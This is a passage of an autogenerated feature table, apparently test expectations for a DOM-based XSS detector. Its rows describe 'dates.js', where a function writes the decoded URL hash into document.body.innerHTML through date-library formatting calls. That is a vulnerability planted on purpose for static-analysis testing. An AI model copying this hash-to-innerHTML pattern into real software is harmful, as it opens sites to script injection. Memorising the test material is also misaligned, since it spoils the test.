| taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:65 | window. ... bstring | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:65 | window. ... bstring | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:68 | exceptional return of window. ... ring(1) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:68 | exceptional return of window. ... ring(1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:68 | exceptional return of window. ... ring(1) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:68 | exceptional return of window. ... ring(1) | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:68 | exceptional return of window. ... ring(1) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:54:36:54:68 | window. ... ring(1) | CalleeFlexibleAccessPath | decodeURIComponent | | autogenerated/Xss/DomBasedXss/dates.js:54:36:54:68 | window. ... ring(1) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:54:36:54:68 | window. ... ring(1) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | @@ -13258,6 +98687,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:54:36:54:68 | window. ... ring(1) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | | autogenerated/Xss/DomBasedXss/dates.js:54:36:54:68 | window. ... ring(1) | enclosingFunctionName | dateio2 | | autogenerated/Xss/DomBasedXss/dates.js:54:36:54:68 | window. ... ring(1) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:54:43:54:50 | location | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:54:43:54:50 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:54:43:54:50 | location | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:54:43:54:50 | location | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:54:43:54:50 | location | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:54:52:54:55 | hash | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:54:52:54:55 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:54:52:54:55 | hash | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:54:52:54:55 | hash | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:54:52:54:55 | hash | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:54:57:54:65 | substring | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:54:57:54:65 | substring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:54:57:54:65 | substring | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:54:57:54:65 | substring | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:54:57:54:65 | substring | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:54:67:54:67 | 1 | CalleeFlexibleAccessPath | window.location.hash.substring | | autogenerated/Xss/DomBasedXss/dates.js:54:67:54:67 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:54:67:54:67 | 1 | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | @@ -13265,12 +98709,134 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:54:67:54:67 | 1 | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | | autogenerated/Xss/DomBasedXss/dates.js:54:67:54:67 | 1 | enclosingFunctionName | dateio2 | | autogenerated/Xss/DomBasedXss/dates.js:54:67:54:67 | 1 | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:56:11:56:16 | moment | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:56:11:56:16 | moment | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:56:11:56:16 | moment | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:56:11:56:16 | moment | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:56:11:56:16 | moment | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:56:11:56:38 | moment | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:56:11:56:38 | moment | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:56:11:56:38 | moment | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:56:11:56:38 | moment | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:56:11:56:38 | moment | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:56:11:56:38 | moment ... apter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:56:11:56:38 | moment ... apter() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:56:11:56:38 | moment ... apter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:56:11:56:38 | moment ... apter() | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:56:11:56:38 | moment ... apter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:56:20:56:38 | exceptional return of new MomentAdapter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:56:20:56:38 | exceptional return of new MomentAdapter() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:56:20:56:38 | exceptional return of new MomentAdapter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:56:20:56:38 | exceptional return of new MomentAdapter() | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:56:20:56:38 | exceptional return of new MomentAdapter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:56:20:56:38 | new MomentAdapter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:56:20:56:38 | new MomentAdapter() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:56:20:56:38 | new MomentAdapter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:56:20:56:38 | new MomentAdapter() | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:56:20:56:38 | new MomentAdapter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:56:24:56:36 | MomentAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:56:24:56:36 | MomentAdapter | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:56:24:56:36 | MomentAdapter | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:56:24:56:36 | MomentAdapter | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:56:24:56:36 | MomentAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:12 | document | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:12 | document | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:17 | document.body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:17 | document.body | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:27 | documen ... nerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:27 | documen ... nerHTML | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:101 | documen ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:101 | documen ... aint)}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:101 | documen ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:101 | documen ... aint)}` | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:5:57:101 | documen ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:14:57:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:14:57:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:57:14:57:17 | body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:14:57:17 | body | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:14:57:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:19:57:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:19:57:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:57:19:57:27 | innerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:19:57:27 | innerHTML | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:19:57:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:57:31:57:101 | `Time i ... aint)}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:57:31:57:101 | `Time i ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:57:31:57:101 | `Time i ... aint)}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:57:31:57:101 | `Time i ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | | autogenerated/Xss/DomBasedXss/dates.js:57:31:57:101 | `Time i ... aint)}` | enclosingFunctionName | dateio2 | | autogenerated/Xss/DomBasedXss/dates.js:57:31:57:101 | `Time i ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:32:57:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:32:57:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:57:32:57:39 | Time is | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:32:57:39 | Time is | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:32:57:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:32:57:39 | Time is | stringConcatenatedWith | -endpoint- moment.addDays().format() | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:47 | moment | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:47 | moment | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:47 | moment | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:47 | moment | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:47 | moment | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:55 | moment.addDays | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:55 | moment.addDays | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:55 | moment.addDays | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:55 | moment.addDays | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:55 | moment.addDays | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:85 | exceptional return of moment. ... 1"), 1) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:85 | exceptional return of moment. ... 1"), 1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:85 | exceptional return of moment. ... 1"), 1) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:85 | exceptional return of moment. ... 1"), 1) | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:85 | exceptional return of moment. ... 1"), 1) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:85 | moment. ... 1"), 1) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:85 | moment. ... 1"), 1) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:85 | moment. ... 1"), 1) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:85 | moment. ... 1"), 1) | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:85 | moment. ... 1"), 1) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:92 | moment. ... .format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:92 | moment. ... .format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:92 | moment. ... .format | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:92 | moment. ... .format | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:92 | moment. ... .format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:99 | exceptional return of moment. ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:99 | exceptional return of moment. ... (taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:99 | exceptional return of moment. ... (taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:99 | exceptional return of moment. ... (taint) | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:99 | exceptional return of moment. ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:99 | moment. ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:99 | moment. ... (taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:99 | moment. ... (taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:99 | moment. ... (taint) | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:99 | moment. ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:42:57:99 | moment. ... (taint) | stringConcatenatedWith | 'Time is ' -endpoint- | +| autogenerated/Xss/DomBasedXss/dates.js:57:49:57:55 | addDays | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:49:57:55 | addDays | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:57:49:57:55 | addDays | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:49:57:55 | addDays | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:49:57:55 | addDays | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:57:57:62 | moment | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:57:57:62 | moment | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:57:57:57:62 | moment | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:57:57:62 | moment | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:57:57:62 | moment | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon 